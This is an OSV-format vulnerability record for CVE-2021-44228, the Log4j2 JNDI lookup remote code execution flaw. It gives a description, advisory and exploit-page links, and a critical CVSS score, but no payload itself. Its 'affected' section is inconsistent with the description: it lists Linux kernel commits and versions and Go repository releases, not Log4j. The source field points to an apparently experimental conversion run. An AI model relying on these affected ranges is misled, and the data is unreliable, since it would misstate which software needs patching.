{"id":"CVE-2021-44228","details":"Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.","aliases":["GHSA-jfh8-c2jp-5v3q"],"modified":"2026-02-24T11:47:18.559348Z","published":"2021-12-10T10:15:09.143Z","related":["MGASA-2021-0556","SUSE-SU-2021:4096-1","SUSE-SU-2021:4097-1","openSUSE-SU-2021:1577-1","openSUSE-SU-2021:1586-1","openSUSE-SU-2021:1601-1","openSUSE-SU-2021:1613-1","openSUSE-SU-2021:3999-1","openSUSE-SU-2021:4094-1","openSUSE-SU-2021:4107-1","openSUSE-SU-2021:4109-1","openSUSE-SU-2024:11666-1","openSUSE-SU-2024:11683-1"],"references":[{"type":"WEB","url":"http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"},{"type":"WEB","url":"http://www.openwall.com/lists/oss-security/2021/12/10/1"},{"type":"WEB","url":"http://www.openwall.com/lists/oss-security/2021/12/10/2"},{"type":"WEB","url":"https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"},{"type":"WEB","url":"https://twitter.com/kurtseifried/status/1469345530182455296"},{"type":"WEB","url":"https://www.kb.cert.org/vuls/id/930724"},{"type":"WEB","url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-44228"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"},{"type":"ADVISORY","url":"http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"},{"type":"ADVISORY","url":"http://seclists.org/fulldisclosure/2022/Dec/2"},{"type":"ADVISORY","url":"http://seclists.org/fulldisclosure/2022/Jul/11"},{"type":"ADVISORY","url":"http://seclists.org/fulldisclosure/2022/Mar/23"},{"type":"ADVISORY","url":"http://www.openwall.com/lists/oss-security/2021/12/10/1"},{"type":"ADVISORY","url":"http://www.openwall.com/lists/oss-security/2021/12/10/2"},{"type":"ADVISORY","url":"http://www.openwall.com/lists/oss-security/2021/12/10/3"},{"type":"ADVISORY","url":"http://www.openwall.com/lists/oss-security/2021/12/13/1"},{"type":"ADVISORY","url":"http://www.openwall.com/lists/oss-security/2021/12/13/2"},{"type":"ADVISORY","url":"http://www.openwall.com/lists/oss-security/2021/12/14/4"},{"type":"ADVISORY","url":"http://www.openwall.com/lists/oss-security/2021/12/15/3"},{"type":"ADVISORY","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"},{"type":"ADVISORY","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"type":"ADVISORY","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"},{"type":"ADVISORY","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"},{"type":"ADVISORY","url":"https://github.com/cisagov/log4j-affected-db"},{"type":"ADVISORY","url":"https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"},{"type":"ADVISORY","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"},{"type":"ADVISORY","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/"},{"type":"ADVISORY","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/"},{"type":"ADVISORY","url":"https://logging.apache.org/log4j/2.x/security.html"},{"type":"ADVISORY","url":"https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"},{"type":"ADVISORY","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"type":"ADVISORY","url":"https://security.netapp.com/advisory/ntap-20211210-0007/"},{"type":"ADVISORY","url":"https://support.apple.com/kb/HT213189"},{"type":"ADVISORY","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"type":"ADVISORY","url":"https://twitter.com/kurtseifried/status/1469345530182455296"},{"type":"ADVISORY","url":"https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"},{"type":"ADVISORY","url":"https://www.debian.org/security/2021/dsa-5020"},{"type":"ADVISORY","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"},{"type":"ADVISORY","url":"https://www.kb.cert.org/vuls/id/930724"},{"type":"ADVISORY","url":"https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"},{"type":"ADVISORY","url":"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"},{"type":"ADVISORY","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"type":"ADVISORY","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"type":"ADVISORY","url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-44228"},{"type":"FIX","url":"https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"},{"type":"FIX","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"type":"FIX","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"type":"ARTICLE","url":"http://seclists.org/fulldisclosure/2022/Dec/2"},{"type":"ARTICLE","url":"http://seclists.org/fulldisclosure/2022/Jul/11"},{"type":"ARTICLE","url":"http://seclists.org/fulldisclosure/2022/Mar/23"},{"type":"ARTICLE","url":"http://www.openwall.com/lists/oss-security/2021/12/10/1"},{"type":"ARTICLE","url":"http://www.openwall.com/lists/oss-security/2021/12/10/2"},{"type":"ARTICLE","url":"http://www.openwall.com/lists/oss-security/2021/12/10/3"},{"type":"ARTICLE","url":"http://www.openwall.com/lists/oss-security/2021/12/13/1"},{"type":"ARTICLE","url":"http://www.openwall.com/lists/oss-security/2021/12/13/2"},{"type":"ARTICLE","url":"http://www.openwall.com/lists/oss-security/2021/12/14/4"},{"type":"ARTICLE","url":"http://www.openwall.com/lists/oss-security/2021/12/15/3"},{"type":"ARTICLE","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"},{"type":"ARTICLE","url":"https://www.debian.org/security/2021/dsa-5020"},{"type":"EVIDENCE","url":"http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"},{"type":"EVIDENCE","url":"http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"type":"EVIDENCE","url":"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"},{"type":"EVIDENCE","url":"http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"},{"type":"EVIDENCE","url":"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"},{"type":"EVIDENCE","url":"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"},{"type":"EVIDENCE","url":"http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"},{"type":"EVIDENCE","url":"http://seclists.org/fulldisclosure/2022/Dec/2"},{"type":"EVIDENCE","url":"https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"},{"type":"EVIDENCE","url":"https://twitter.com/kurtseifried/status/1469345530182455296"},{"type":"EVIDENCE","url":"https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git","events":[{"introduced":"805a6af8dba5dfdd35ec35dc52ec0122400b2610"},{"fixed":"28a33cbc24e4256c143dce96c7d93bf423229f92"}]}],"versions":["v3.2","v3.3","v3.3-rc1","v3.3-rc2","v3.3-rc3","v3.3-rc4","v3.3-rc5","v3.3-rc6","v3.3-rc7","v3.4","v3.4-rc1","v3.4-rc2","v3.4-rc3","v3.4-rc4","v3.4-rc5","v3.4-rc6","v3.4-rc7","v3.5-rc1","v3.5-rc2","v3.5-rc3","v3.5-rc4","v3.5-rc5","v3.5-rc6","v3.5-rc7"],"database_specific":{"source":"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2021-44228.json"}},{"ranges":[{"type":"GIT","repo":"https://github.com/golang/go","events":[{"introduced":"0"},{"fixed":"0380c9ad38843d523d9c9804fe300cb7edd7cd3c"}]}],"versions":["go1.10beta1","go1.10beta2","go1.10rc1","go1.10rc2","go1.11beta1","go1.11beta2","go1.11beta3","go1.12","go1.12beta1","go1.12beta2","go1.12rc1","go1.3beta1","go1.3beta2","go1.4beta1","go1.5beta1","go1.5beta2","go1.5beta3","go1.6beta1","go1.6beta2","go1.7beta1","go1.7beta2","go1.7rc1","go1.7rc2","go1.7rc3","go1.7rc4","go1.8beta1","go1.8beta2","go1.9beta1","go1.9beta2","release.r56","weekly","weekly.2009-11-06","weekly.2009-11-10","weekly.2009-11-10.1","weekly.2009-11-12","weekly.2009-11-17","weekly.2009-12-07","weekly.2009-12-09","weekly.2009-12-22","weekly.2010-01-05","weekly.2010-01-13","weekly.2010-01-27","weekly.2010-02-04","weekly.2010-02-17","weekly.2010-02-23","weekly.2010-03-04","weekly.2010-03-15","weekly.2010-03-22","weekly.2010-03-30","weekly.2010-04-13","weekly.2010-04-27","weekly.2010-05-04","weekly.2010-05-27","weekly.2010-06-09","weekly.2010-06-21","weekly.2010-07-01","weekly.2010-07-14","weekly.2010-07-29","weekly.2010-08-04","weekly.2010-08-11","weekly.2010-08-25","weekly.2010-09-06","weekly.2010-09-15","weekly.2010-09-22","weekly.2010-09-29","weekly.2010-10-13","weekly.2010-10-13.1","weekly.2010-10-20","weekly.2010-10-27","weekly.2010-11-02","weekly.2010-11-10","weekly.2010-11-23","weekly.2010-12-02","weekly.2010-12-08","weekly.2010-12-15","weekly.2010-12-15.1","weekly.2010-12-22","weekly.2011-01-06","weekly.2011-01-12","weekly.2011-01-19","weekly.2011-01-20","weekly.2011-02-01","weekly.2011-02-01.1","weekly.2011-02-15","weekly.2011-02-24","weekly.2011-03-07","weekly.2011-03-07.1","weekly.2011-03-15","weekly.2011-03-28","weekly.2011-04-04","weekly.2011-04-13","weekly.2011-04-27","weekly.2011-05-22","weekly.2011-06-02","weekly.2011-06-09","weekly.2011-06-16","weekly.2011-06-23","weekly.2011-07-07","weekly.2011-07-19","weekly.2011-07-29","weekly.2011-08-10","weekly.2011-08-17","weekly.2011-09-01","weekly.2011-09-07","weekly.2011-09-16","weekly.2011-09-21","weekly.2011-10-06","weekly.2011-10-18","weekly.2011-10-25","weekly.2011-10-26","weekly.2011-11-01","weekly.2011-11-02","weekly.2011-11-08","weekly.2011-11-09","weekly.2011-11-18","weekly.2011-12-01","weekly.2011-12-02","weekly.2011-12-06","weekly.2011-12-14","weekly.2011-12-22","weekly.2012-01-15","weekly.2012-01-20","weekly.2012-01-27","weekly.2012-02-07","weekly.2012-02-14","weekly.2012-02-22","weekly.2012-03-04","weekly.2012-03-13","weekly.2012-03-22","weekly.2012-03-27"],"database_specific":{"source":"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2021-44228.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}]}